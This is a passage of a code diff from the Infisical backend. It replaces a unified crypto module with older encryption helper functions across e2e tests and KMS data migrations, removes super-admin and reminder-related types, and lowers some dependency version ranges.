-# ENV NODE_OPTIONS=--force-fips # Note(Daniel): We can't set this on the node options because it may break for existing folks using the infisical/infisical-fips image. Instead we call crypto.setFips(true) at runtime.
-ENV FIPS_ENABLED=true
+ENV NODE_OPTIONS=--force-fips
 
 CMD ["npm", "run", "dev:docker"]

backend/e2e-test/mocks/queue.ts

@@ -24,7 +24,6 @@ export const mockQueue = (): TQueueServiceFactory => {
       events[name] = event;
     },
     getRepeatableJobs: async () => [],
-    getDelayedJobs: async () => [],
     clearQueue: async () => {},
     stopJobById: async () => {},
     stopJobByIdPg: async () => {},

backend/e2e-test/routes/v2/service-token.spec.ts

@@ -1,9 +1,8 @@
+import crypto from "node:crypto";
+
 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
-import { initEnvConfig } from "@app/lib/config/env";
-import { SymmetricKeySize } from "@app/lib/crypto";
-import { crypto } from "@app/lib/crypto/cryptography";
-import { initLogger, logger } from "@app/lib/logger";
+import { decryptAsymmetric, decryptSymmetric128BitHexKeyUTF8, encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
 
 const createServiceToken = async (
   scopes: { environment: string; secretPath: string }[],
@@ -27,8 +26,7 @@ const createServiceToken = async (
   });
   const { user: userInfo } = JSON.parse(userInfoRes.payload);
   const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-
-  const projectKey = crypto.encryption().asymmetric().decrypt({
+  const projectKey = decryptAsymmetric({
     ciphertext: projectKeyEnc.encryptedKey,
     nonce: projectKeyEnc.nonce,
     publicKey: projectKeyEnc.sender.publicKey,
@@ -36,13 +34,7 @@ const createServiceToken = async (
   });
 
   const randomBytes = crypto.randomBytes(16).toString("hex");
-
-  const { ciphertext, iv, tag } = crypto.encryption().symmetric().encrypt({
-    plaintext: projectKey,
-    key: randomBytes,
-    keySize: SymmetricKeySize.Bits128
-  });
-
+  const { ciphertext, iv, tag } = encryptSymmetric128BitHexKeyUTF8(projectKey, randomBytes);
   const serviceTokenRes = await testServer.inject({
     method: "POST",
     url: "/api/v2/service-token",
@@ -145,9 +137,6 @@ describe("Service token secret ops", async () => {
   let projectKey = "";
   let folderId = "";
   beforeAll(async () => {
-    initLogger();
-    await initEnvConfig(testSuperAdminDAL, logger);
-
     serviceToken = await createServiceToken(
       [{ secretPath: "/**", environment: seedData1.environment.slug }],
       ["read", "write"]
@@ -164,13 +153,11 @@ describe("Service token secret ops", async () => {
     expect(serviceTokenInfoRes.statusCode).toBe(200);
     const serviceTokenInfo = serviceTokenInfoRes.json();
     const serviceTokenParts = serviceToken.split(".");
-
-    projectKey = crypto.encryption().symmetric().decrypt({
+    projectKey = decryptSymmetric128BitHexKeyUTF8({
       key: serviceTokenParts[3],
       tag: serviceTokenInfo.tag,
       ciphertext: serviceTokenInfo.encryptedKey,
-      iv: serviceTokenInfo.iv,
-      keySize: SymmetricKeySize.Bits128
+      iv: serviceTokenInfo.iv
     });
 
     // create a deep folder

backend/e2e-test/routes/v3/secrets.spec.ts

@@ -1,8 +1,6 @@
 import { SecretType, TSecrets } from "@app/db/schemas";
 import { decryptSecret, encryptSecret, getUserPrivateKey, seedData1 } from "@app/db/seed-data";
-import { initEnvConfig } from "@app/lib/config/env";
-import { crypto } from "@app/lib/crypto/cryptography";
-import { initLogger, logger } from "@app/lib/logger";
+import { decryptAsymmetric, encryptAsymmetric } from "@app/lib/crypto";
 import { AuthMode } from "@app/services/auth/auth-type";
 
 const createSecret = async (dto: {
@@ -157,9 +155,6 @@ describe("Secret V3 Router", async () => {
   let projectKey = "";
   let folderId = "";
   beforeAll(async () => {
-    initLogger();
-    await initEnvConfig(testSuperAdminDAL, logger);
-
     const projectKeyRes = await testServer.inject({
       method: "GET",
       url: `/api/v2/workspace/${seedData1.project.id}/encrypted-key`,
@@ -178,7 +173,7 @@ describe("Secret V3 Router", async () => {
     });
     const { user: userInfo } = JSON.parse(userInfoRes.payload);
     const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-    projectKey = crypto.encryption().asymmetric().decrypt({
+    projectKey = decryptAsymmetric({
       ciphertext: projectKeyEncryptionDetails.encryptedKey,
       nonce: projectKeyEncryptionDetails.nonce,
       publicKey: projectKeyEncryptionDetails.sender.publicKey,
@@ -674,7 +669,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
       const { user: userInfo } = JSON.parse(userInfoRes.payload);
 
       const privateKey = await getUserPrivateKey(seedData1.password, userInfo);
-      const projectKey = crypto.encryption().asymmetric().decrypt({
+      const projectKey = decryptAsymmetric({
         ciphertext: projectKeyEnc.encryptedKey,
         nonce: projectKeyEnc.nonce,
         publicKey: projectKeyEnc.sender.publicKey,
@@ -690,7 +685,7 @@ describe.each([{ auth: AuthMode.JWT }, { auth: AuthMode.IDENTITY_ACCESS_TOKEN }]
       });
       expect(projectBotRes.statusCode).toEqual(200);
       const projectBot = JSON.parse(projectBotRes.payload).bot;
-      const botKey = crypto.encryption().asymmetric().encrypt(projectKey, projectBot.publicKey, privateKey);
+      const botKey = encryptAsymmetric(projectKey, projectBot.publicKey, privateKey);
 
       // set bot as active
       const setBotActive = await testServer.inject({

backend/e2e-test/vitest-environment-knex.ts

@@ -2,11 +2,11 @@
 import "ts-node/register";
 
 import dotenv from "dotenv";
-import { crypto } from "@app/lib/crypto/cryptography";
+import jwt from "jsonwebtoken";
 import path from "path";
 
 import { seedData1 } from "@app/db/seed-data";
-import { getDatabaseCredentials, initEnvConfig } from "@app/lib/config/env";
+import { initEnvConfig } from "@app/lib/config/env";
 import { initLogger } from "@app/lib/logger";
 import { main } from "@app/server/app";
 import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
@@ -17,7 +17,6 @@ import { queueServiceFactory } from "@app/queue";
 import { keyStoreFactory } from "@app/keystore/keystore";
 import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
 import { buildRedisFromConfig } from "@app/lib/config/redis";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 dotenv.config({ path: path.join(__dirname, "../../.env.test"), debug: true });
 export default {
@@ -25,17 +24,13 @@ export default {
   transformMode: "ssr",
   async setup() {
     const logger = initLogger();
-    const databaseCredentials = getDatabaseCredentials(logger);
-
+    const envConfig = initEnvConfig(logger);
     const db = initDbConnection({
-      dbConnectionUri: databaseCredentials.dbConnectionUri,
-      dbRootCert: databaseCredentials.dbRootCert
+      dbConnectionUri: envConfig.DB_CONNECTION_URI,
+      dbRootCert: envConfig.DB_ROOT_CERT
     });
 
-    const superAdminDAL = superAdminDALFactory(db);
-    const envCfg = await initEnvConfig(superAdminDAL, logger);
-
-    const redis = buildRedisFromConfig(envCfg);
+    const redis = buildRedisFromConfig(envConfig);
     await redis.flushdb("SYNC");
 
     try {
@@ -60,10 +55,10 @@ export default {
       });
 
       const smtp = mockSmtpServer();
-      const queue = queueServiceFactory(envCfg, { dbConnectionUrl: envCfg.DB_CONNECTION_URI });
-      const keyStore = keyStoreFactory(envCfg);
+      const queue = queueServiceFactory(envConfig, { dbConnectionUrl: envConfig.DB_CONNECTION_URI });
+      const keyStore = keyStoreFactory(envConfig);
 
-      const hsmModule = initializeHsmModule(envCfg);
+      const hsmModule = initializeHsmModule(envConfig);
       hsmModule.initialize();
 
       const server = await main({
@@ -73,17 +68,14 @@ export default {
         queue,
         keyStore,
         hsmModule: hsmModule.getModule(),
-        superAdminDAL,
         redis,
-        envConfig: envCfg
+        envConfig
       });
 
       // @ts-expect-error type
       globalThis.testServer = server;
       // @ts-expect-error type
-      globalThis.testSuperAdminDAL = superAdminDAL;
-      // @ts-expect-error type
-      globalThis.jwtAuthToken = crypto.jwt().sign(
+      globalThis.jwtAuthToken = jwt.sign(
         {
           authTokenType: AuthTokenType.ACCESS_TOKEN,
           userId: seedData1.id,
@@ -92,8 +84,8 @@ export default {
           organizationId: seedData1.organization.id,
           accessVersion: 1
         },
-        envCfg.AUTH_SECRET,
-        { expiresIn: envCfg.JWT_AUTH_LIFETIME }
+        envConfig.AUTH_SECRET,
+        { expiresIn: envConfig.JWT_AUTH_LIFETIME }
       );
     } catch (error) {
       // eslint-disable-next-line
@@ -110,8 +102,6 @@ export default {
         // @ts-expect-error type
         delete globalThis.testServer;
         // @ts-expect-error type
-        delete globalThis.testSuperAdminDAL;
-        // @ts-expect-error type
         delete globalThis.jwtToken;
         // called after all tests with this env have been run
         await db.migrate.rollback(

backend/package.json

@@ -84,7 +84,6 @@
     "@babel/plugin-syntax-import-attributes": "^7.24.7",
     "@babel/preset-env": "^7.18.10",
     "@babel/preset-react": "^7.24.7",
-    "@smithy/types": "^4.3.1",
     "@types/bcrypt": "^5.0.2",
     "@types/jmespath": "^0.15.2",
     "@types/jsonwebtoken": "^9.0.5",
@@ -153,7 +152,7 @@
     "@gitbeaker/rest": "^42.5.0",
     "@google-cloud/kms": "^4.5.0",
     "@infisical/quic": "^1.0.8",
-    "@node-saml/passport-saml": "^5.1.0",
+    "@node-saml/passport-saml": "^5.0.1",
     "@octokit/auth-app": "^7.1.1",
     "@octokit/core": "^5.2.1",
     "@octokit/plugin-paginate-graphql": "^4.0.1",
@@ -181,7 +180,7 @@
     "ajv": "^8.12.0",
     "argon2": "^0.31.2",
     "aws-sdk": "^2.1553.0",
-    "axios": "^1.11.0",
+    "axios": "^1.6.7",
     "axios-retry": "^4.0.0",
     "bcrypt": "^5.1.1",
     "botbuilder": "^4.23.2",

backend/src/@types/fastify-zod.d.ts

@@ -2,7 +2,6 @@ import { FastifyInstance, RawReplyDefaultExpression, RawRequestDefaultExpression
 
 import { CustomLogger } from "@app/lib/logger/logger";
 import { ZodTypeProvider } from "@app/server/plugins/fastify-zod";
-import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 declare global {
   type FastifyZodProvider = FastifyInstance<
@@ -15,6 +14,5 @@ declare global {
 
   // used only for testing
   const testServer: FastifyZodProvider;
-  const testSuperAdminDAL: TSuperAdminDALFactory;
   const jwtAuthToken: string;
 }

backend/src/@types/fastify.d.ts

@@ -93,7 +93,6 @@ import { TProjectEnvServiceFactory } from "@app/services/project-env/project-env
 import { TProjectKeyServiceFactory } from "@app/services/project-key/project-key-service";
 import { TProjectMembershipServiceFactory } from "@app/services/project-membership/project-membership-service";
 import { TProjectRoleServiceFactory } from "@app/services/project-role/project-role-service";
-import { TReminderServiceFactory } from "@app/services/reminder/reminder-types";
 import { TSecretServiceFactory } from "@app/services/secret/secret-service";
 import { TSecretBlindIndexServiceFactory } from "@app/services/secret-blind-index/secret-blind-index-service";
 import { TSecretFolderServiceFactory } from "@app/services/secret-folder/secret-folder-service";
@@ -126,15 +125,6 @@ declare module "@fastify/request-context" {
         namespace: string;
         name: string;
       };
-      aws?: {
-        accountId: string;
-        arn: string;
-        userId: string;
-        partition: string;
-        service: string;
-        resourceType: string;
-        resourceName: string;
-      };
     };
     identityPermissionMetadata?: Record<string, unknown>; // filled by permission service
     assumedPrivilegeDetails?: { requesterId: string; actorId: string; actorType: ActorType; projectId: string };
@@ -295,7 +285,6 @@ declare module "fastify" {
       secretScanningV2: TSecretScanningV2ServiceFactory;
       internalCertificateAuthority: TInternalCertificateAuthorityServiceFactory;
       pkiTemplate: TPkiTemplatesServiceFactory;
-      reminder: TReminderServiceFactory;
     };
     // this is exclusive use for middlewares in which we need to inject data
     // everywhere else access using service layer

backend/src/@types/knex.d.ts

@@ -489,11 +489,6 @@ import {
   TWorkflowIntegrationsInsert,
   TWorkflowIntegrationsUpdate
 } from "@app/db/schemas";
-import {
-  TAccessApprovalPoliciesEnvironments,
-  TAccessApprovalPoliciesEnvironmentsInsert,
-  TAccessApprovalPoliciesEnvironmentsUpdate
-} from "@app/db/schemas/access-approval-policies-environments";
 import {
   TIdentityLdapAuths,
   TIdentityLdapAuthsInsert,
@@ -509,17 +504,6 @@ import {
   TProjectMicrosoftTeamsConfigsInsert,
   TProjectMicrosoftTeamsConfigsUpdate
 } from "@app/db/schemas/project-microsoft-teams-configs";
-import { TReminders, TRemindersInsert, TRemindersUpdate } from "@app/db/schemas/reminders";
-import {
-  TRemindersRecipients,
-  TRemindersRecipientsInsert,
-  TRemindersRecipientsUpdate
-} from "@app/db/schemas/reminders-recipients";
-import {
-  TSecretApprovalPoliciesEnvironments,
-  TSecretApprovalPoliciesEnvironmentsInsert,
-  TSecretApprovalPoliciesEnvironmentsUpdate
-} from "@app/db/schemas/secret-approval-policies-environments";
 import {
   TSecretReminderRecipients,
   TSecretReminderRecipientsInsert,
@@ -897,12 +881,6 @@ declare module "knex/types/tables" {
       TAccessApprovalPoliciesBypassersUpdate
     >;
 
-    [TableName.AccessApprovalPolicyEnvironment]: KnexOriginal.CompositeTableType<
-      TAccessApprovalPoliciesEnvironments,
-      TAccessApprovalPoliciesEnvironmentsInsert,
-      TAccessApprovalPoliciesEnvironmentsUpdate
-    >;
-
     [TableName.AccessApprovalRequest]: KnexOriginal.CompositeTableType<
       TAccessApprovalRequests,
       TAccessApprovalRequestsInsert,
@@ -951,11 +929,6 @@ declare module "knex/types/tables" {
       TSecretApprovalRequestSecretTagsInsert,
       TSecretApprovalRequestSecretTagsUpdate
     >;
-    [TableName.SecretApprovalPolicyEnvironment]: KnexOriginal.CompositeTableType<
-      TSecretApprovalPoliciesEnvironments,
-      TSecretApprovalPoliciesEnvironmentsInsert,
-      TSecretApprovalPoliciesEnvironmentsUpdate
-    >;
     [TableName.SecretRotation]: KnexOriginal.CompositeTableType<
       TSecretRotations,
       TSecretRotationsInsert,
@@ -1238,11 +1211,5 @@ declare module "knex/types/tables" {
       TSecretScanningConfigsInsert,
       TSecretScanningConfigsUpdate
     >;
-    [TableName.Reminder]: KnexOriginal.CompositeTableType<TReminders, TRemindersInsert, TRemindersUpdate>;
-    [TableName.ReminderRecipient]: KnexOriginal.CompositeTableType<
-      TRemindersRecipients,
-      TRemindersRecipientsInsert,
-      TRemindersRecipientsUpdate
-    >;
   }
 }

backend/src/db/migrations/20250210101840_webhook-to-kms.ts

@@ -1,10 +1,9 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { crypto } from "@app/lib/crypto/cryptography";
+import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -27,12 +26,9 @@ export async function up(knex: Knex): Promise<void> {
   }
 
   initLogger();
-  const superAdminDAL = superAdminDALFactory(knex);
-  const envConfig = await getMigrationEnvConfig(superAdminDAL);
-
+  const envConfig = getMigrationEnvConfig();
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
-
   const projectEncryptionRingBuffer =
     createCircularCache<Awaited<ReturnType<(typeof kmsService)["createCipherPairWithDataKey"]>>>(25);
   const webhooks = await knex(TableName.Webhook)
@@ -69,15 +65,12 @@ export async function up(knex: Knex): Promise<void> {
 
       let encryptedSecretKey = null;
       if (el.encryptedSecretKey && el.iv && el.tag && el.keyEncoding) {
-        const decyptedSecretKey = crypto
-          .encryption()
-          .symmetric()
-          .decryptWithRootEncryptionKey({
-            keyEncoding: el.keyEncoding as SecretKeyEncoding,
-            iv: el.iv,
-            tag: el.tag,
-            ciphertext: el.encryptedSecretKey
-          });
+        const decyptedSecretKey = infisicalSymmetricDecrypt({
+          keyEncoding: el.keyEncoding as SecretKeyEncoding,
+          iv: el.iv,
+          tag: el.tag,
+          ciphertext: el.encryptedSecretKey
+        });
         encryptedSecretKey = projectKmsService.encryptor({
           plainText: Buffer.from(decyptedSecretKey, "utf8")
         }).cipherTextBlob;
@@ -85,15 +78,12 @@ export async function up(knex: Knex): Promise<void> {
 
       const decryptedUrl =
         el.urlIV && el.urlTag && el.urlCipherText && el.keyEncoding
-          ? crypto
-              .encryption()
-              .symmetric()
-              .decryptWithRootEncryptionKey({
-                keyEncoding: el.keyEncoding as SecretKeyEncoding,
-                iv: el.urlIV,
-                tag: el.urlTag,
-                ciphertext: el.urlCipherText
-              })
+          ? infisicalSymmetricDecrypt({
+              keyEncoding: el.keyEncoding as SecretKeyEncoding,
+              iv: el.urlIV,
+              tag: el.urlTag,
+              ciphertext: el.urlCipherText
+            })
           : null;
 
       const encryptedUrl = projectKmsService.encryptor({

backend/src/db/migrations/20250210101841_dynamic-secret-root-to-kms.ts

@@ -1,11 +1,10 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { crypto } from "@app/lib/crypto/cryptography";
+import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -30,9 +29,7 @@ export async function up(knex: Knex): Promise<void> {
   }
 
   initLogger();
-  const superAdminDAL = superAdminDALFactory(knex);
-  const envConfig = await getMigrationEnvConfig(superAdminDAL);
-
+  const envConfig = getMigrationEnvConfig();
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const projectEncryptionRingBuffer =
@@ -63,23 +60,20 @@ export async function up(knex: Knex): Promise<void> {
         // eslint-disable-next-line @typescript-eslint/ban-ts-comment
         // @ts-ignore This will be removed in next cycle so ignore the ts missing error
         el.inputIV && el.inputTag && el.inputCiphertext && el.keyEncoding
-          ? crypto
-              .encryption()
-              .symmetric()
-              .decryptWithRootEncryptionKey({
-                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-                keyEncoding: el.keyEncoding as SecretKeyEncoding,
-                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-                iv: el.inputIV,
-                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-                tag: el.inputTag,
-                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-                ciphertext: el.inputCiphertext
-              })
+          ? infisicalSymmetricDecrypt({
+              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              keyEncoding: el.keyEncoding as SecretKeyEncoding,
+              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              iv: el.inputIV,
+              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              tag: el.inputTag,
+              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              ciphertext: el.inputCiphertext
+            })
           : "";
 
       const encryptedInput = projectKmsService.encryptor({

backend/src/db/migrations/20250210101841_secret-rotation-to-kms.ts

@@ -1,11 +1,10 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { crypto } from "@app/lib/crypto/cryptography";
+import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -24,9 +23,7 @@ export async function up(knex: Knex): Promise<void> {
   }
 
   initLogger();
-  const superAdminDAL = superAdminDALFactory(knex);
-  const envConfig = await getMigrationEnvConfig(superAdminDAL);
-
+  const envConfig = getMigrationEnvConfig();
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const projectEncryptionRingBuffer =
@@ -56,23 +53,20 @@ export async function up(knex: Knex): Promise<void> {
         // eslint-disable-next-line @typescript-eslint/ban-ts-comment
         // @ts-ignore This will be removed in next cycle so ignore the ts missing error
         el.encryptedDataTag && el.encryptedDataIV && el.encryptedData && el.keyEncoding
-          ? crypto
-              .encryption()
-              .symmetric()
-              .decryptWithRootEncryptionKey({
-                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-                keyEncoding: el.keyEncoding as SecretKeyEncoding,
-                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-                iv: el.encryptedDataIV,
-                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-                tag: el.encryptedDataTag,
-                // eslint-disable-next-line @typescript-eslint/ban-ts-comment
-                // @ts-ignore This will be removed in next cycle so ignore the ts missing error
-                ciphertext: el.encryptedData
-              })
+          ? infisicalSymmetricDecrypt({
+              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              keyEncoding: el.keyEncoding as SecretKeyEncoding,
+              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              iv: el.encryptedDataIV,
+              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              tag: el.encryptedDataTag,
+              // eslint-disable-next-line @typescript-eslint/ban-ts-comment
+              // @ts-ignore This will be removed in next cycle so ignore the ts missing error
+              ciphertext: el.encryptedData
+            })
           : "";
 
       const encryptedRotationData = projectKmsService.encryptor({

backend/src/db/migrations/20250210101842_identity-k8-auth-to-kms.ts

@@ -1,11 +1,10 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
+import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -55,9 +54,7 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
   }
 
   initLogger();
-  const superAdminDAL = superAdminDALFactory(knex);
-  const envConfig = await getMigrationEnvConfig(superAdminDAL);
-
+  const envConfig = getMigrationEnvConfig();
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -102,23 +99,19 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
       orgEncryptionRingBuffer.push(orgId, orgKmsService);
     }
 
-    const key = crypto
-      .encryption()
-      .symmetric()
-      .decryptWithRootEncryptionKey({
-        ciphertext: encryptedSymmetricKey,
-        iv: symmetricKeyIV,
-        tag: symmetricKeyTag,
-        keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-      });
+    const key = infisicalSymmetricDecrypt({
+      ciphertext: encryptedSymmetricKey,
+      iv: symmetricKeyIV,
+      tag: symmetricKeyTag,
+      keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+    });
 
     const decryptedTokenReviewerJwt =
       // eslint-disable-next-line @typescript-eslint/ban-ts-comment
       // @ts-ignore This will be removed in next cycle so ignore the ts missing error
       el.encryptedTokenReviewerJwt && el.tokenReviewerJwtIV && el.tokenReviewerJwtTag
-        ? crypto.encryption().symmetric().decrypt({
+        ? decryptSymmetric({
             key,
-            keySize: SymmetricKeySize.Bits256,
             // eslint-disable-next-line @typescript-eslint/ban-ts-comment
             // @ts-ignore This will be removed in next cycle so ignore the ts missing error
             iv: el.tokenReviewerJwtIV,
@@ -135,9 +128,8 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
       // eslint-disable-next-line @typescript-eslint/ban-ts-comment
       // @ts-ignore This will be removed in next cycle so ignore the ts missing error
       el.encryptedCaCert && el.caCertIV && el.caCertTag
-        ? crypto.encryption().symmetric().decrypt({
+        ? decryptSymmetric({
             key,
-            keySize: SymmetricKeySize.Bits256,
             // eslint-disable-next-line @typescript-eslint/ban-ts-comment
             // @ts-ignore This will be removed in next cycle so ignore the ts missing error
             iv: el.caCertIV,

backend/src/db/migrations/20250210101842_identity-oidc-auth-to-kms.ts

@@ -1,11 +1,10 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
+import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -35,9 +34,7 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
   }
 
   initLogger();
-  const superAdminDAL = superAdminDALFactory(knex);
-  const envConfig = await getMigrationEnvConfig(superAdminDAL);
-
+  const envConfig = getMigrationEnvConfig();
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -74,24 +71,19 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(orgId, orgKmsService);
         }
-
-        const key = crypto
-          .encryption()
-          .symmetric()
-          .decryptWithRootEncryptionKey({
-            ciphertext: encryptedSymmetricKey,
-            iv: symmetricKeyIV,
-            tag: symmetricKeyTag,
-            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-          });
+        const key = infisicalSymmetricDecrypt({
+          ciphertext: encryptedSymmetricKey,
+          iv: symmetricKeyIV,
+          tag: symmetricKeyTag,
+          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+        });
 
         const decryptedCertificate =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedCaCert && el.caCertIV && el.caCertTag
-            ? crypto.encryption().symmetric().decrypt({
+            ? decryptSymmetric({
                 key,
-                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.caCertIV,

backend/src/db/migrations/20250210101845_directory-config-to-kms.ts

@@ -1,11 +1,10 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
+import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
-import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -28,8 +27,7 @@ const reencryptSamlConfig = async (knex: Knex) => {
   }
 
   initLogger();
-  const superAdminDAL = superAdminDALFactory(knex);
-  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+  const envConfig = getMigrationEnvConfig();
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -60,24 +58,19 @@ const reencryptSamlConfig = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
         }
-
-        const key = crypto
-          .encryption()
-          .symmetric()
-          .decryptWithRootEncryptionKey({
-            ciphertext: encryptedSymmetricKey,
-            iv: symmetricKeyIV,
-            tag: symmetricKeyTag,
-            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-          });
+        const key = infisicalSymmetricDecrypt({
+          ciphertext: encryptedSymmetricKey,
+          iv: symmetricKeyIV,
+          tag: symmetricKeyTag,
+          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+        });
 
         const decryptedEntryPoint =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedEntryPoint && el.entryPointIV && el.entryPointTag
-            ? crypto.encryption().symmetric().decrypt({
+            ? decryptSymmetric({
                 key,
-                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.entryPointIV,
@@ -94,9 +87,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedIssuer && el.issuerIV && el.issuerTag
-            ? crypto.encryption().symmetric().decrypt({
+            ? decryptSymmetric({
                 key,
-                keySize: SymmetricKeySize.Bits256,
